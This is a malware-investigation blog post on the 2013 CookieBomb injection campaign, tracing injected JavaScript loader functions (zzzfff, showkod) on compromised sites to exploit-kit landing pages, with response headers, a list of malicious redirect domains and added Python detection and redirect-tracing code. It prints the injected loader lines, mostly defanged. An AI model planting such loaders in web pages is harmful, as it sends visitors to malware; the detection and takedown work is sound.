What is behind #CookieBomb attack? (by @malm0u53)
23 Jul 2013
I saw a widespread code-injection infection reported here and decided to help the investigation:
As you may see in my tweets, I was struggling with the recently reported infection, and I came to a conclusion about what to grep for in order to follow and mitigate this attack further:
RT @unixfreaxjp: @Secluded_Memory you know I would if I could, I can't now, grab it from my prev.tweets, --- Helping too
— MalMouse (@malm0u53) July 22, 2013
@Secluded_Memory @unixfreaxjp CookieBomb javascript. Which seems to be the function zzzfff()
— MalMouse (@malm0u53) July 22, 2013
Which ended up as a list of the injected functions and their IFRAME redirection targets:
@Secluded_Memory @unixfreaxjp one variant out of last three days - showkod(){ versus zzzfff() hxxp://airbrush-design.cz/images/nGMcmjkK.php
— MalMouse (@malm0u53) July 22, 2013
Wow, many links to follow. So I made a breakdown check of each PHP infector, released in the pastebin here: http://pastebin.com/raw.php?i=0cGUGk8X
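As an added example (not code from the original post or from MMD), here is a small detector for the injection pattern the tweets describe: it scans page source for a short function that points an element's src at a remote .php loader, reports the known function names (zzzfff, showkod) and also flags unknown names that keep the same shape. The HTML sample, hostnames and helper names are constructed for this example.

```python
import re
from html import unescape

# Constructed sample page fragment (not a capture from the post). It mirrors the
# reported injection: a short function that points a hidden element's src at a
# remote .php loader, plus a renamed variant and an unrelated clean function.
SAMPLE_HTML = """<html><body>
<script>
function zzzfff() { mdi.src = 'http://example-infected.test/images/loader.php';
document.body.appendChild(mdi); }
</script>
<script>function showkod(){ js_kod.src = "http://example-other.test/cnt.php"; }</script>
<script>function qwe1() { zz.src = 'http://example-new.test/traf.php'; }</script>
<script>function clean() { img.src = '/static/logo.png'; }</script>
</body></html>"""

# Function names the post ties to this campaign; extend as new variants appear.
INJECT_FUNCS = ("zzzfff", "showkod")

# function <name>() { <element>.src = '<url>'   (either quote style)
_PATTERN = re.compile(
    r"function\s+(?P<fn>\w+)\s*\(\s*\)\s*\{\s*(?P<var>\w+)\.src\s*=\s*"
    r"(?P<q>['\"])(?P<url>[^'\"]+)(?P=q)"
)

def defang(url):
    """Rewrite the scheme to hxxp so the indicator is not clickable in a report."""
    return re.sub(r"^http", "hxxp", url, flags=re.IGNORECASE)

def find_injections(html):
    """Return one dict per injected loader found in the page source."""
    hits = []
    for m in _PATTERN.finditer(unescape(html)):
        fn, url = m.group("fn"), m.group("url")
        known = fn in INJECT_FUNCS
        remote_php = url.lower().startswith(("http://", "https://", "//")) \
            and url.lower().split("?")[0].endswith(".php")
        # Match on the known names, and on unknown names that keep the same shape
        # (remote .php loader) so renamed variants are still surfaced for review.
        if known or remote_php:
            hits.append({"function": fn, "element": m.group("var"),
                         "url": defang(url), "known_variant": known})
    return hits
```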
The significant results I found are summarized below.
One of the links:
function zzzfff() { ony.src = 'hxxp://www.ics-it.de/ftp_folders/JptDMrR2.php';
goes straight to the exploit landing page I mentioned here:
redirect >> hxxp://kastenbafortschrittliche.jaimestexmex.com:801/untrue-doing-edge_ago.htm
The other link goes straight to a fake 502:
function zzzfff() { rf.src = 'hxxp://appssold.com/wp-content/plugins/wp_add/D7AoggfC.php';
>> 500 Internal Server Error (the verdict of the malicious URL above is here)
// header..
HTTP/1.1 500 Internal Server Error
Date: Mon, 22 Jul 2013 18:05:49 GMT
Server: Apache/2.2.21 (Unix) mod_ssl/2.2.21 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Content-Length: 704
Connection: close
Content-Type: text/html; charset=iso-8859-1
One of the links redirects to localhost, which is strange for a legitimate link, isn't it?
function zzzfff() { gifdu.src = 'hxxp://olafknischewski.de/usage/esd.php';
HTTP/1.1 302 Found
Date: Mon, 22 Jul 2013 18:14:02 GMT
Server: Apache
X-Powered-By: PHP/5.2.12-nmm3
Location: http://localhost/
Vary: Accept-Encoding
Content-Length: 0
Connection: close
Content-Type: text/html
One link leads to a permanent redirection to an Exploit Kit landing page; that IP is a Plesk panel user (verdict: [1] and [2]):
function zzzfff() { gzz.src = 'hxxp://intrologic.nl/Mn84DfXb.php';
HTTP/1.1 301 Moved Permanently
Date: Mon, 22 Jul 2013 18:16:48 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.17
X-Pingback: http://www.intrologic.nl/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Location: hxxp://www.intrologic.nl/Mn84DfXb.php
X-Powered-By: PleskLin
One link:
function zzzfff() { c.src = 'hxxp://goldsilver.server101.com/ORIGINALGSB/traf.php';
loads malware from the traf.php above and redirects users to: hxxp://www.schwarzeraben.de/rel.php
This attack uses the .htaccess file to redirect users to sites serving malware (verdict: [1] http://labs.sucuri.net/db/malware/malware-entry-mwhta7 [3]). The redirection target domains, with the results of the MMD domain check tool for each, are:
fgnfdfthrv.bee.pl,127.0.0.1,
alolipololi.osa.pl,74.125.236.80,
gberbhjerfds.osa.pl,127.0.0.1,
zxsoftpromo.ru,,
centralfederation.ru,,
chimeboom.ru,,
faqaboutme.ru,,
lkjoiban.ru,,
longqwality.ru,,
zxsoftpromo.ru,,
which means (WARNING!) the alolipololi.osa.pl domain is currently active for infection, fgnfdfthrv.bee.pl and gberbhjerfds.osa.pl are currently blacklisted (they resolve to 127.0.0.1), and the other .RU domains are inactive.
The links below went straight to blacklisted sites (verdict: [1] [2]):
function zzzfff() { csp.src = 'hxxp://thyrr062.xsrv.jp/clicker.php';
HTTP/1.1 200 OK
Date: Mon, 22 Jul 2013 18:57:28 GMT
Server: Apache
X-Powered-By: PHP/5.3.3
Connection: close
Content-Type: text/html
And (verdict: [1] [2]):
function zzzfff() { nex.src = 'hxxp://informationking.com/dnlds/kQBx948q.php';
HTTP/1.1 200 OK
Date: Mon, 22 Jul 2013 19:03:40 GMT
Server: Apache/1.3.41 (Unix) FrontPage/5.0.2.2635 PHP/5.2.17 mod_ssl/2.8.31 OpenSSL/0.9.8j
X-Powered-By: PHP/5.2.17
Connection: close
Content-Type: text/html
There are many other similar results in the pastebin I reported here.
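Added example, not the author's tooling: the per-link breakdown check above amounts to following each loader's Location headers and classifying where the chain ends. The raw response heads below are constructed stand-ins for the three outcomes seen on this page (redirect chain ending on a landing page, redirect to localhost, fake 50x error), with placeholder hostnames.

```python
from urllib.parse import urljoin, urlparse

# Constructed raw HTTP response heads keyed by the URL that returned them. These
# are stand-ins for the post's captures, with placeholder hostnames.
RESPONSES = {
    "http://infected-a.test/x.php":
        "HTTP/1.1 301 Moved Permanently\r\nServer: Apache\r\n"
        "Location: http://www.infected-a.test/x.php\r\n\r\n",
    "http://www.infected-a.test/x.php":
        "HTTP/1.1 302 Found\r\nLocation: http://landing.test:801/untrue.htm\r\n\r\n",
    "http://landing.test:801/untrue.htm":
        "HTTP/1.1 200 OK\r\nContent-Type: text/html\r\n\r\n",
    "http://infected-b.test/esd.php":
        "HTTP/1.1 302 Found\r\nLocation: http://localhost/\r\n\r\n",
    "http://infected-c.test/D7.php":
        "HTTP/1.1 500 Internal Server Error\r\nContent-Length: 704\r\n\r\n",
}

def parse_head(raw):
    """Split a raw response head into (status code, lower-cased header dict)."""
    status_line, _, rest = raw.partition("\r\n")
    status = int(status_line.split()[1])
    headers = {}
    for line in rest.split("\r\n"):
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return status, headers

def follow_chain(start, fetch, max_hops=5):
    """Follow Location headers from `start`; return (verdict, list of hops).

    `fetch(url)` returns the raw response head, or None if the host is unreachable.
    """
    hops, url = [start], start
    for _ in range(max_hops):
        raw = fetch(url)
        if raw is None:
            return "unreachable", hops
        status, headers = parse_head(raw)
        location = headers.get("location")
        if 300 <= status < 400 and location:
            target = urljoin(url, location)
            hops.append(target)
            # A gate that bounces the visitor to localhost is refusing or cloaking.
            if (urlparse(target).hostname or "") in ("localhost", "127.0.0.1"):
                return "redirect-to-localhost", hops
            url = target
            continue
        if status >= 500:
            return "server-error", hops          # the fake 50x page some loaders return
        if status == 200:
            return ("landing-after-redirects" if len(hops) > 1 else "serves-content"), hops
        return "http-%d" % status, hops
    return "too-many-hops", hops
```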
This investigation is posted to help reach a verdict on the malicious activities caused by the #CookieBomb code-injection attack and to support the shutdown of its detected malicious domains. The post is a group effort; thank you to @DarrelRendell and @Secluded_Memory for supporting this case with great advice.
#MalwareMustDie!